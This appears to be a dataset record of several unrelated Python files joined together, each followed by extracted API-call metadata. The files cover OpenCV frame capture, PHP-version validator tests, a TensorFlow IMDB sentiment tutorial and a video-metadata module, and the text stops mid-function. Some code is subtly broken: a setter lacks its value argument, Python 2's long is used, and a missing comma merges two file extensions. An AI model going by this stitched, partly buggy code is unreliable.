27131), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (27129, 27131), True, 'import datetime as dt\n'), ((29316, 29344), 'numpy.arange', 'np.arange', (['MVBS_val.shape[2]'], {}), '(MVBS_val.shape[2])\n', (29325, 29344), True, 'import numpy as np\n'), ((29926, 29943), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (29941, 29943), True, 'import datetime as dt\n'), ((12203, 12220), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (12218, 12220), True, 'import datetime as dt\n'), ((26948, 26965), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (26963, 26965), True, 'import datetime as dt\n'), ((12066, 12083), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (12081, 12083), True, 'import datetime as dt\n'), ((28029, 28088), 'numpy.unique', 'np.unique', (['(self.MVBS_range_bin_size / self.sample_thickness)'], {}), '(self.MVBS_range_bin_size / self.sample_thickness)\n', (28038, 28088), True, 'import numpy as np\n'), ((22756, 22820), 'numpy.unique', 'np.unique', (['(self.noise_est_range_bin_size / self.sample_thickness)'], {}), '(self.noise_est_range_bin_size / self.sample_thickness)\n', (22765, 22820), True, 'import numpy as np\n')] |
import cv2
import numpy as np
import time
class CaptureManager(object):
def __init__(self, capture, preview_window_manager=None, should_mirror_preview = False):
self.preview_window_manager = preview_window_manager
self.should_mirror_preview = should_mirror_preview
self._capture = capture
self._channel = 0
self._entered_frame = False
self._frame = None
self._frames_elapsed = long(0)
self._fps_est = None
@property
def channel(self):
return self._channel
@channel.setter
def channel(self):
return self._channel
@property
def frame(self):
if self._entered_frame and self._frame is None:
_, self._frame = self._capture.retrieve(channel=self.channel)
return self._frame
def enter_frame(self):
# capture the next frame
assert not self._entered_frame, 'previous enter_frame() had no matching exit_frame()'
if self._capture is not None:
self._entered_frame = self._capture.grab()
def exit_frame(self):
# draw to window, write to files, release the frame
# frame is retrievable or not
if self.frame is None:
self._entered_frame = False
return
if self._frames_elapsed == 0:
self._start_time = time.time()
else:
time_elapsed = time.time() - self._start_time
self._fps_est = self._frames_elapsed / time_elapsed
self._frames_elapsed += 1
# draw
if self.preview_window_manager is not None:
if self.should_mirror_preview:
mirrored_frame = np.fliplr(self._frame).copy()
self.preview_window_manager.show(mirrored_frame)
else:
self.preview_window_manager.show(self._frame)
# release the frame
self._frame = None
self._entered_frame = False
class WindowManager(object):
def __init__(self, window_name, keypress_callback = None):
self.keypress_callback = keypress_callback
self._window_name = window_name
self._is_window_created = False
@property
def is_window_created(self):
return self._is_window_created
def create_window(self):
cv2.namedWindow(self._window_name)
self._is_window_created = True
def show(self, frame):
cv2.imshow(self._window_name, frame)
def destroy_window(self):
cv2.destroyWindow(self._window_name)
self._is_window_created = False
def process_events(self):
keykode = cv2.waitKey(1)
if self.keypress_callback is not None and keykode != -1:
keykode &= 0xFF
self.keypress_callback(keykode)
| [
"cv2.destroyWindow",
"numpy.fliplr",
"cv2.imshow",
"cv2.waitKey",
"time.time",
"cv2.namedWindow"
]
| [((2291, 2325), 'cv2.namedWindow', 'cv2.namedWindow', (['self._window_name'], {}), '(self._window_name)\n', (2306, 2325), False, 'import cv2\n'), ((2401, 2437), 'cv2.imshow', 'cv2.imshow', (['self._window_name', 'frame'], {}), '(self._window_name, frame)\n', (2411, 2437), False, 'import cv2\n'), ((2477, 2513), 'cv2.destroyWindow', 'cv2.destroyWindow', (['self._window_name'], {}), '(self._window_name)\n', (2494, 2513), False, 'import cv2\n'), ((2603, 2617), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (2614, 2617), False, 'import cv2\n'), ((1346, 1357), 'time.time', 'time.time', ([], {}), '()\n', (1355, 1357), False, 'import time\n'), ((1399, 1410), 'time.time', 'time.time', ([], {}), '()\n', (1408, 1410), False, 'import time\n'), ((1672, 1694), 'numpy.fliplr', 'np.fliplr', (['self._frame'], {}), '(self._frame)\n', (1681, 1694), True, 'import numpy as np\n')] |
from PHPUnitKit.tests import unittest
from PHPUnitKit.plugin import is_valid_php_version_file_version
class TestIsValidPhpVersionFileVersion(unittest.TestCase):
def test_invalid_values(self):
self.assertFalse(is_valid_php_version_file_version(''))
self.assertFalse(is_valid_php_version_file_version(' '))
self.assertFalse(is_valid_php_version_file_version('foobar'))
self.assertFalse(is_valid_php_version_file_version('masterfoo'))
self.assertFalse(is_valid_php_version_file_version('.'))
self.assertFalse(is_valid_php_version_file_version('x'))
self.assertFalse(is_valid_php_version_file_version('x.x'))
self.assertFalse(is_valid_php_version_file_version('x.x.x'))
self.assertFalse(is_valid_php_version_file_version('x'))
self.assertFalse(is_valid_php_version_file_version('snapshot'))
def test_master_branch_version(self):
self.assertTrue(is_valid_php_version_file_version('master'))
def test_specific_semver_versions(self):
self.assertTrue(is_valid_php_version_file_version('5.0.0'))
self.assertTrue(is_valid_php_version_file_version('5.0.1'))
self.assertTrue(is_valid_php_version_file_version('5.0.7'))
self.assertTrue(is_valid_php_version_file_version('5.0.30'))
self.assertTrue(is_valid_php_version_file_version('5.0.32'))
self.assertTrue(is_valid_php_version_file_version('5.1.0'))
self.assertTrue(is_valid_php_version_file_version('5.1.1'))
self.assertTrue(is_valid_php_version_file_version('5.1.3'))
self.assertTrue(is_valid_php_version_file_version('5.1.27'))
self.assertTrue(is_valid_php_version_file_version('7.0.0'))
self.assertTrue(is_valid_php_version_file_version('7.1.19'))
def test_minor_versions(self):
self.assertTrue(is_valid_php_version_file_version('5.6'))
self.assertTrue(is_valid_php_version_file_version('7.1'))
self.assertTrue(is_valid_php_version_file_version('7.2'))
def test_major_dot_x_versions(self):
self.assertTrue(is_valid_php_version_file_version('5.x'))
self.assertTrue(is_valid_php_version_file_version('6.x'))
self.assertTrue(is_valid_php_version_file_version('7.x'))
self.assertTrue(is_valid_php_version_file_version('8.x'))
def test_major_dot_minor_dot_x_versions(self):
self.assertTrue(is_valid_php_version_file_version('7.0.x'))
self.assertTrue(is_valid_php_version_file_version('7.1.x'))
self.assertTrue(is_valid_php_version_file_version('7.2.x'))
def test_snapshot_versions(self):
self.assertTrue(is_valid_php_version_file_version('5.4snapshot'))
self.assertTrue(is_valid_php_version_file_version('5.5snapshot'))
self.assertTrue(is_valid_php_version_file_version('5.6snapshot'))
self.assertTrue(is_valid_php_version_file_version('7.0snapshot'))
self.assertTrue(is_valid_php_version_file_version('7.1snapshot'))
self.assertTrue(is_valid_php_version_file_version('7.0.0snapshot'))
self.assertTrue(is_valid_php_version_file_version('7.1.0snapshot'))
self.assertTrue(is_valid_php_version_file_version('7.1.1snapshot'))
| [
"PHPUnitKit.plugin.is_valid_php_version_file_version"
]
| [((225, 262), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['""""""'], {}), "('')\n", (258, 262), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((289, 327), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['""" """'], {}), "(' ')\n", (322, 327), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((354, 397), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""foobar"""'], {}), "('foobar')\n", (387, 397), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((424, 470), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""masterfoo"""'], {}), "('masterfoo')\n", (457, 470), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((497, 535), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""."""'], {}), "('.')\n", (530, 535), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((562, 600), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""x"""'], {}), "('x')\n", (595, 600), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((627, 667), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""x.x"""'], {}), "('x.x')\n", (660, 667), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((694, 736), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""x.x.x"""'], {}), "('x.x.x')\n", (727, 736), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((763, 801), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""x"""'], {}), "('x')\n", (796, 801), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((828, 873), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""snapshot"""'], {}), "('snapshot')\n", (861, 873), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((942, 985), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""master"""'], {}), "('master')\n", (975, 985), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1057, 1099), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.0.0"""'], {}), "('5.0.0')\n", (1090, 1099), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1125, 1167), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.0.1"""'], {}), "('5.0.1')\n", (1158, 1167), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1193, 1235), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.0.7"""'], {}), "('5.0.7')\n", (1226, 1235), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1261, 1304), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.0.30"""'], {}), "('5.0.30')\n", (1294, 1304), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1330, 1373), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.0.32"""'], {}), "('5.0.32')\n", (1363, 1373), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1399, 1441), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.1.0"""'], {}), "('5.1.0')\n", (1432, 1441), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1467, 1509), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.1.1"""'], {}), "('5.1.1')\n", (1500, 1509), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1535, 1577), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.1.3"""'], {}), "('5.1.3')\n", (1568, 1577), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1603, 1646), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.1.27"""'], {}), "('5.1.27')\n", (1636, 1646), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1672, 1714), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.0.0"""'], {}), "('7.0.0')\n", (1705, 1714), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1740, 1783), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.1.19"""'], {}), "('7.1.19')\n", (1773, 1783), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1845, 1885), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.6"""'], {}), "('5.6')\n", (1878, 1885), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1911, 1951), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.1"""'], {}), "('7.1')\n", (1944, 1951), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((1977, 2017), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.2"""'], {}), "('7.2')\n", (2010, 2017), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2085, 2125), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.x"""'], {}), "('5.x')\n", (2118, 2125), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2151, 2191), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""6.x"""'], {}), "('6.x')\n", (2184, 2191), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2217, 2257), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.x"""'], {}), "('7.x')\n", (2250, 2257), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2283, 2323), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""8.x"""'], {}), "('8.x')\n", (2316, 2323), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2401, 2443), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.0.x"""'], {}), "('7.0.x')\n", (2434, 2443), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2469, 2511), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.1.x"""'], {}), "('7.1.x')\n", (2502, 2511), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2537, 2579), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.2.x"""'], {}), "('7.2.x')\n", (2570, 2579), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2644, 2692), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.4snapshot"""'], {}), "('5.4snapshot')\n", (2677, 2692), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2718, 2766), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.5snapshot"""'], {}), "('5.5snapshot')\n", (2751, 2766), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2792, 2840), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""5.6snapshot"""'], {}), "('5.6snapshot')\n", (2825, 2840), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2866, 2914), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.0snapshot"""'], {}), "('7.0snapshot')\n", (2899, 2914), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((2940, 2988), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.1snapshot"""'], {}), "('7.1snapshot')\n", (2973, 2988), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((3014, 3064), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.0.0snapshot"""'], {}), "('7.0.0snapshot')\n", (3047, 3064), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((3090, 3140), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.1.0snapshot"""'], {}), "('7.1.0snapshot')\n", (3123, 3140), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n'), ((3166, 3216), 'PHPUnitKit.plugin.is_valid_php_version_file_version', 'is_valid_php_version_file_version', (['"""7.1.1snapshot"""'], {}), "('7.1.1snapshot')\n", (3199, 3216), False, 'from PHPUnitKit.plugin import is_valid_php_version_file_version\n')] |
#----------------
# 01_02 文本分类
#----------------
# TensorFlow and tf.keras
import tensorflow as tf
from tensorflow import keras
# Helper libraries
import numpy as np
import matplotlib.pyplot as plt
# TensorFlow's version : 1.12.0
print('TensorFlow\'s version : ', tf.__version__)
#----------------
# 1 下载 IMDB 数据集
#----------------
imdb = keras.datasets.imdb
(train_data, train_labels), (test_data, test_labels) = imdb.load_data(num_words=10000)
#----------------
# 2 探索数据
#----------------
# Training entries: 25000, labels: 25000
print("Training entries: {}, labels: {}".format(len(train_data), len(train_labels)))
print(train_data[0])
# (218, 189)
print(len(train_data[0]), len(train_data[1]))
# A dictionary mapping words to an integer index
word_index = imdb.get_word_index()
# The first indices are reserved
word_index = {k:(v+3) for k,v in word_index.items()}
word_index["<PAD>"] = 0
word_index["<START>"] = 1
word_index["<UNK>"] = 2 # unknown
word_index["<UNUSED>"] = 3
reverse_word_index = dict([(value, key) for (key, value) in word_index.items()])
def decode_review(text):
return ' '.join([reverse_word_index.get(i, '?') for i in text])
decode_review(train_data[0])
#----------------
# 3 准备数据
#----------------
train_data = keras.preprocessing.sequence.pad_sequences(train_data,
value=word_index["<PAD>"],
padding='post',
maxlen=256)
test_data = keras.preprocessing.sequence.pad_sequences(test_data,
value=word_index["<PAD>"],
padding='post',
maxlen=256)
# (256, 256)
print((len(train_data[0]), len(train_data[1])))
print(train_data[0])
#----------------
# 4 构建模型
#----------------
# input shape is the vocabulary count used for the movie reviews (10,000 words)
vocab_size = 10000
model = keras.Sequential()
model.add(keras.layers.Embedding(vocab_size, 16))
model.add(keras.layers.GlobalAveragePooling1D())
model.add(keras.layers.Dense(16, activation=tf.nn.relu))
model.add(keras.layers.Dense(1, activation=tf.nn.sigmoid))
model.summary()
model.compile(optimizer=tf.train.AdamOptimizer(),
loss='binary_crossentropy',
metrics=['accuracy'])
#----------------
# 5 创建验证集
#----------------
x_val = train_data[:10000]
partial_x_train = train_data[10000:]
y_val = train_labels[:10000]
partial_y_train = train_labels[10000:]
#----------------
# 6 训练模型
#----------------
history = model.fit(partial_x_train,
partial_y_train,
epochs=40,
batch_size=512,
validation_data=(x_val, y_val),
verbose=1)
#----------------
# 7 评估模型
#----------------
results = model.evaluate(test_data, test_labels)
print(results)
#----------------
# 8 创建准确率和损失随时间变化的图
#----------------
history_dict = history.history
# dict_keys(['loss', 'val_loss', 'val_acc', 'acc'])
print(history_dict.keys())
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(acc) + 1)
# loss
# "bo" is for "blue dot"
plt.plot(epochs, loss, 'bo', label='Training loss')
# b is for "solid blue line"
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
# acc
plt.clf() # clear figure
acc_values = history_dict['acc']
val_acc_values = history_dict['val_acc']
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend()
plt.show()
| [
"tensorflow.keras.preprocessing.sequence.pad_sequences",
"tensorflow.keras.Sequential",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.clf",
"tensorflow.keras.layers.Embedding",
"tensorflow.keras.layers.Dense",
"tensorflow.keras.layers.GlobalAveragePooling1D",
"matplotlib.pyplot.title",
"tensorflow.train.AdamOptimizer",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
]
| [((1257, 1371), 'tensorflow.keras.preprocessing.sequence.pad_sequences', 'keras.preprocessing.sequence.pad_sequences', (['train_data'], {'value': "word_index['<PAD>']", 'padding': '"""post"""', 'maxlen': '(256)'}), "(train_data, value=word_index[\n '<PAD>'], padding='post', maxlen=256)\n", (1299, 1371), False, 'from tensorflow import keras\n'), ((1548, 1661), 'tensorflow.keras.preprocessing.sequence.pad_sequences', 'keras.preprocessing.sequence.pad_sequences', (['test_data'], {'value': "word_index['<PAD>']", 'padding': '"""post"""', 'maxlen': '(256)'}), "(test_data, value=word_index[\n '<PAD>'], padding='post', maxlen=256)\n", (1590, 1661), False, 'from tensorflow import keras\n'), ((2061, 2079), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\n', (2077, 2079), False, 'from tensorflow import keras\n'), ((3378, 3429), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'loss', '"""bo"""'], {'label': '"""Training loss"""'}), "(epochs, loss, 'bo', label='Training loss')\n", (3386, 3429), True, 'import matplotlib.pyplot as plt\n'), ((3459, 3515), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'val_loss', '"""b"""'], {'label': '"""Validation loss"""'}), "(epochs, val_loss, 'b', label='Validation loss')\n", (3467, 3515), True, 'import matplotlib.pyplot as plt\n'), ((3516, 3557), 'matplotlib.pyplot.title', 'plt.title', (['"""Training and validation loss"""'], {}), "('Training and validation loss')\n", (3525, 3557), True, 'import matplotlib.pyplot as plt\n'), ((3558, 3578), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Epochs"""'], {}), "('Epochs')\n", (3568, 3578), True, 'import matplotlib.pyplot as plt\n'), ((3579, 3597), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Loss"""'], {}), "('Loss')\n", (3589, 3597), True, 'import matplotlib.pyplot as plt\n'), ((3598, 3610), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (3608, 3610), True, 'import matplotlib.pyplot as plt\n'), ((3612, 3622), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3620, 3622), True, 'import matplotlib.pyplot as plt\n'), ((3631, 3640), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (3638, 3640), True, 'import matplotlib.pyplot as plt\n'), ((3733, 3782), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'acc', '"""bo"""'], {'label': '"""Training acc"""'}), "(epochs, acc, 'bo', label='Training acc')\n", (3741, 3782), True, 'import matplotlib.pyplot as plt\n'), ((3783, 3837), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'val_acc', '"""b"""'], {'label': '"""Validation acc"""'}), "(epochs, val_acc, 'b', label='Validation acc')\n", (3791, 3837), True, 'import matplotlib.pyplot as plt\n'), ((3838, 3883), 'matplotlib.pyplot.title', 'plt.title', (['"""Training and validation accuracy"""'], {}), "('Training and validation accuracy')\n", (3847, 3883), True, 'import matplotlib.pyplot as plt\n'), ((3884, 3904), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Epochs"""'], {}), "('Epochs')\n", (3894, 3904), True, 'import matplotlib.pyplot as plt\n'), ((3905, 3927), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Accuracy"""'], {}), "('Accuracy')\n", (3915, 3927), True, 'import matplotlib.pyplot as plt\n'), ((3928, 3940), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (3938, 3940), True, 'import matplotlib.pyplot as plt\n'), ((3942, 3952), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3950, 3952), True, 'import matplotlib.pyplot as plt\n'), ((2090, 2128), 'tensorflow.keras.layers.Embedding', 'keras.layers.Embedding', (['vocab_size', '(16)'], {}), '(vocab_size, 16)\n', (2112, 2128), False, 'from tensorflow import keras\n'), ((2140, 2177), 'tensorflow.keras.layers.GlobalAveragePooling1D', 'keras.layers.GlobalAveragePooling1D', ([], {}), '()\n', (2175, 2177), False, 'from tensorflow import keras\n'), ((2189, 2234), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(16)'], {'activation': 'tf.nn.relu'}), '(16, activation=tf.nn.relu)\n', (2207, 2234), False, 'from tensorflow import keras\n'), ((2246, 2293), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(1)'], {'activation': 'tf.nn.sigmoid'}), '(1, activation=tf.nn.sigmoid)\n', (2264, 2293), False, 'from tensorflow import keras\n'), ((2337, 2361), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {}), '()\n', (2359, 2361), True, 'import tensorflow as tf\n')] |
# -*- coding: utf-8 -*-
from __future__ import division
from datetime import datetime, timedelta
import logging
import os
from guessit import guessit
logger = logging.getLogger(__name__)
#: Video extensions
VIDEO_EXTENSIONS = ('.3g2', '.3gp', '.3gp2', '.3gpp', '.60d', '.ajp', '.asf', '.asx', '.avchd', '.avi', '.bik',
'.bix', '.box', '.cam', '.dat', '.divx', '.dmf', '.dv', '.dvr-ms', '.evo', '.flc', '.fli',
'.flic', '.flv', '.flx', '.gvi', '.gvp', '.h264', '.m1v', '.m2p', '.m2ts', '.m2v', '.m4e',
'.m4v', '.mjp', '.mjpeg', '.mjpg', '.mkv', '.moov', '.mov', '.movhd', '.movie', '.movx', '.mp4',
'.mpe', '.mpeg', '.mpg', '.mpv', '.mpv2', '.mxf', '.nsv', '.nut', '.ogg', '.ogm' '.ogv', '.omf',
'.ps', '.qt', '.ram', '.rm', '.rmvb', '.swf', '.ts', '.vfw', '.vid', '.video', '.viv', '.vivo',
'.vob', '.vro', '.wm', '.wmv', '.wmx', '.wrap', '.wvx', '.wx', '.x264', '.xvid')
class Video(object):
"""Base class for videos.
Represent a video, existing or not.
:param str name: name or path of the video.
:param str format: format of the video (HDTV, WEB-DL, BluRay, ...).
:param str release_group: release group of the video.
:param str resolution: resolution of the video stream (480p, 720p, 1080p or 1080i).
:param str video_codec: codec of the video stream.
:param str audio_codec: codec of the main audio stream.
:param str imdb_id: IMDb id of the video.
:param dict hashes: hashes of the video file by provider names.
:param int size: size of the video file in bytes.
:param set subtitle_languages: existing subtitle languages.
"""
def __init__(self, name, format=None, release_group=None, resolution=None, video_codec=None, audio_codec=None,
imdb_id=None, hashes=None, size=None, subtitle_languages=None):
#: Name or path of the video
self.name = name
#: Format of the video (HDTV, WEB-DL, BluRay, ...)
self.format = format
#: Release group of the video
self.release_group = release_group
#: Resolution of the video stream (480p, 720p, 1080p or 1080i)
self.resolution = resolution
#: Codec of the video stream
self.video_codec = video_codec
#: Codec of the main audio stream
self.audio_codec = audio_codec
#: IMDb id of the video
self.imdb_id = imdb_id
#: Hashes of the video file by provider names
self.hashes = hashes or {}
#: Size of the video file in bytes
self.size = size
#: Existing subtitle languages
self.subtitle_languages = subtitle_languages or set()
@property
def exists(self):
"""Test whether the video exists"""
return os.path.exists(self.name)
@property
def age(self):
"""Age of the video"""
if self.exists:
return datetime.utcnow() - datetime.utcfromtimestamp(os.path.getmtime(self.name))
return timedelta()
@classmethod
def fromguess(cls, name, guess):
"""Create an :class:`Episode` or a :class:`Movie` with the given `name` based on the `guess`.
:param str name: name of the video.
:param dict guess: guessed data.
:raise: :class:`ValueError` if the `type` of the `guess` is invalid
"""
if guess['type'] == 'episode':
return Episode.fromguess(name, guess)
if guess['type'] == 'movie':
return Movie.fromguess(name, guess)
raise ValueError('The guess must be an episode or a movie guess')
@classmethod
def fromname(cls, name, options=None):
"""Shortcut for :meth:`fromguess` with a `guess` guessed from the `name`.
:param str name: name of the video.
"""
if options is not None:
return cls.fromguess(name, guessit(name, options=options))
else:
return cls.fromguess(name, guessit(name))
def __repr__(self):
return '<%s [%r]>' % (self.__class__.__name__, self.name)
def __hash__(self):
return hash(self.name)
class Episode(Video):
"""Episode :class:`Video`.
:param str series: series of the episode.
:param int season: season number of the episode.
:param int episode: episode number of the episode.
:param str title: title of the episode.
:param int year: year of the series.
:param bool original_series: whether the series is the first with this name.
:param int tvdb_id: TVDB id of the episode.
:param \*\*kwargs: additional parameters for the :class:`Video` constructor.
"""
def __init__(self, name, series, season, episode, title=None, year=None, original_series=True, tvdb_id=None,
series_tvdb_id=None, series_imdb_id=None, **kwargs):
super(Episode, self).__init__(name, **kwargs)
#: Series of the episode
self.series = series
#: Season number of the episode
self.season = season
#: Episode number of the episode
self.episode = episode
#: Title of the episode
self.title = title
#: Year of series
self.year = year
#: The series is the first with this name
self.original_series = original_series
#: TVDB id of the episode
self.tvdb_id = tvdb_id
#: TVDB id of the series
self.series_tvdb_id = series_tvdb_id
#: IMDb id of the series
self.series_imdb_id = series_imdb_id
@classmethod
def fromguess(cls, name, guess):
if guess['type'] != 'episode':
raise ValueError('The guess must be an episode guess')
if 'title' not in guess or 'episode' not in guess:
raise ValueError('Insufficient data to process the guess')
return cls(name, guess['title'], guess.get('season', 1), guess['episode'], title=guess.get('episode_title'),
year=guess.get('year'), format=guess.get('format'), original_series='year' not in guess,
release_group=guess.get('release_group'), resolution=guess.get('screen_size'),
video_codec=guess.get('video_codec'), audio_codec=guess.get('audio_codec'))
@classmethod
def fromname(cls, name):
return cls.fromguess(name, guessit(name, {'type': 'episode'}))
def __repr__(self):
if self.year is None:
return '<%s [%r, %dx%d]>' % (self.__class__.__name__, self.series, self.season, self.episode)
return '<%s [%r, %d, %dx%d]>' % (self.__class__.__name__, self.series, self.year, self.season, self.episode)
class Movie(Video):
"""Movie :class:`Video`.
:param str title: title of the movie.
:param int year: year of the movie.
:param \*\*kwargs: additional parameters for the :class:`Video` constructor.
"""
def __init__(self, name, title, year=None, **kwargs):
super(Movie, self).__init__(name, **kwargs)
#: Title of the movie
self.title = title
#: Year of the movie
self.year = year
@classmethod
def fromguess(cls, name, guess):
if guess['type'] != 'movie':
raise ValueError('The guess must be a movie guess')
if 'title' not in guess:
raise ValueError('Insufficient data to process the guess')
return cls(name, guess['title'], format=guess.get('format'), release_group=guess.get('release_group'),
resolution=guess.get('screen_size'), video_codec=guess.get('video_codec'),
